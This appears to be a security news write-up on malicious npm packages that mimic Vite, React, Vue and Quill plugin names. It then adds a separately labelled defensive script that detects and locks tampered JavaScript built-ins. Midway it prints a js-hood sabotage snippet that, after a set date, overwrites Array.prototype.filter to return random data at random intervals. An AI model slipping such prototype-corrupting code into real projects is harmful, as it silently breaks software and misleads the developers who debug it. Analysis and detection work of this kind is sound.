In a troubling development for the JavaScript ecosystem, security researchers have discovered a sophisticated campaign targeting popular frameworks through weaponized npm packages.
These malicious packages, which have accumulated over 6,200 downloads, masquerade as legitimate plugins and utilities while secretly containing destructive payloads designed to corrupt data, delete critical files, and crash systems.
The threat actor behind this campaign, using the npm alias “xuxingfeng” with a registration email 1634389031@qq[.]com, has employed a clever dual strategy of publishing both harmful and helpful packages.
By releasing legitimate, properly functioning packages alongside malicious ones, the attacker creates a facade of trustworthiness that makes their harmful code more likely to be installed and incorporated into projects.
Socket.dev researchers identified eight malicious packages that remain active on the npm registry as of May 22, 2025.
These packages rely on typosquatting and name mimicry techniques to gain installation, with names like “vite-plugin-react-extend” (typosquatting the legitimate @vitejs/plugin-react) and “quill-image-downloader” (mimicking the naming pattern of legitimate Quill editor plugins).
The packages strategically target some of the most popular tools in modern JavaScript development, including Vite (with 28M+ weekly downloads) and widely-used plugins for frameworks like React and Vue.js.
By mimicking common plugin names, attackers exploit developers’ reliance on third-party extensions and their trust in the npm ecosystem.
What makes this campaign particularly concerning is the diversity of attack vectors deployed, ranging from subtle data corruption to aggressive system shutdowns and file deletion.
The packages were designed to target different parts of the JavaScript ecosystem with varied tactics, creating a multi-faceted threat landscape.
Among the most sophisticated components of this attack is the “js-hood” package, which directly targets JavaScript’s fundamental methods.
Unlike packages that cause immediate, obvious damage through file deletion or system shutdowns, js-hood introduces subtle but devastating corruption of core JavaScript functionality.
The package specifically corrupts numerous fundamental JavaScript methods, including essential Array methods like filter, push, pop, map, and slice, as well as critical String methods such as split, replaceAll, and trim.
Each corrupted method keeps its expected syntax and signature but returns completely random and unpredictable values:
```javascript
// After August 1, 2023, start corrupting JavaScript
if(new Date().getTime() > new Date("2023/08/01 08:00:01").getTime()) {
    setInterval(() => {
        // Replace Array.prototype.filter with nonsense function
        Array.prototype.filter = function(fn) {
            var arr = this, len = arr.length, arg = arguments[1] || window,
                newArr = [], item;
            for(var i = 0; i < len; i++) {
                item = JSON.parse(JSON.stringify(arr[i]));
                fn.apply(arg, [item, i, arr]) ? newArr.push(item) : "";
            }
            // Instead of returning filtered data, return array of random characters
            return Array(len).fill(randomVal(characterArr));
        };
    }, randomVal(items) * 60 * 1000); // Random interval between 5-10 minutes
}
```
This approach is particularly dangerous because applications continue to run without obvious errors, but produce corrupted, unpredictable outputs.
By introducing non-deterministic failures that return random data at randomized intervals of 5-10 minutes, the malware creates hard-to-diagnose intermittent problems that persist through debugging efforts.
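Because the corrupted methods keep their signatures, the tampering is invisible to ordinary unit tests unless something compares the built-ins against known-good references. The following is an added defensive example, not code from the article or from any of the packages it describes: it captures the Array and String methods the article lists at startup, audits them later for identity changes or non-native overrides, and optionally locks them. The `withTamperedFilter` helper is a constructed stand-in for the override shown above, used only to show that the audit catches it; the method list and function names are this example's own choices.

```javascript
// Added defensive example: detect runtime monkey-patching of built-in prototype
// methods by comparing them with references captured at process start.
// This is illustrative code, not from the article or the js-hood package.
'use strict';

// The methods the article reports as corrupted (example's own selection).
const WATCHED = {
  Array: ['filter', 'push', 'pop', 'map', 'slice'],
  String: ['split', 'replaceAll', 'trim'],
};
const PROTOS = { Array: Array.prototype, String: String.prototype };

// Capture pristine references before any third-party module is loaded; in a real
// application this file would be the first module required by the entry point.
// Function.prototype.toString is captured too, so a patched toString cannot
// disguise a non-native override as native code.
const nativeToString = Function.prototype.toString;
const pristine = new Map();
for (const [ctor, names] of Object.entries(WATCHED)) {
  for (const name of names) {
    pristine.set(`${ctor}.prototype.${name}`, PROTOS[ctor][name]);
  }
}

// True when the engine reports the function as native ("{ [native code] }").
function isNativeCode(fn) {
  return typeof fn === 'function' &&
    /\[native code\]\s*\}\s*$/.test(nativeToString.call(fn));
}

// Returns one finding per tampered method; an empty list means all are untouched.
// Both checks are needed: a patch that swaps in a *different* native function
// (e.g. pointing map at filter) would still pass the native-code test alone.
function auditPrototypes() {
  const findings = [];
  for (const [key, original] of pristine) {
    const [ctor, , name] = key.split('.');
    const current = PROTOS[ctor][name];
    if (current !== original) {
      findings.push({ method: key, reason: 'identity changed since startup' });
    } else if (!isNativeCode(current)) {
      findings.push({ method: key, reason: 'not native code' });
    }
  }
  return findings;
}

// Optional mitigation: make the watched methods non-writable and non-configurable,
// so a later assignment throws in strict mode or is silently ignored otherwise.
// Apply only after any legitimate polyfills have loaded, or they will break too.
function lockWatchedMethods() {
  for (const [ctor, names] of Object.entries(WATCHED)) {
    for (const name of names) {
      Object.defineProperty(PROTOS[ctor], name, {
        value: PROTOS[ctor][name],
        writable: false,
        configurable: false,
        enumerable: false,
      });
    }
  }
}

// Constructed stand-in for the behaviour the article describes: a filter that keeps
// its signature but returns filler instead of the filtered items. It runs the
// callback while the override is in place and always restores the original.
function withTamperedFilter(callback) {
  const saved = Array.prototype.filter;
  Array.prototype.filter = function () { return Array(this.length).fill('?'); };
  try {
    return callback();
  } finally {
    Array.prototype.filter = saved;
  }
}

// Demo when run directly: a clean audit, an audit under tampering, then restored.
if (typeof require !== 'undefined' && require.main === module) {
  console.log('clean audit:', auditPrototypes());
  console.log('tampered audit:', withTamperedFilter(() => auditPrototypes()));
  console.log('restored:', auditPrototypes().length === 0);
}
```

Running the audit periodically (or on every request in a server) turns the "random data at random intervals" pattern into an immediate, attributable alert instead of a weeks-long debugging hunt; locking the prototypes stops the overwrite outright but should be enabled only once the application's own polyfills are known to have loaded.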
For developers who suspect exposure, security experts recommend immediately auditing installed dependencies, restoring affected environments from verified sources, and rotating all potentially compromised credentials.
Organizations should also implement package security scanning tools that can detect these types of supply chain attacks before they enter the codebase.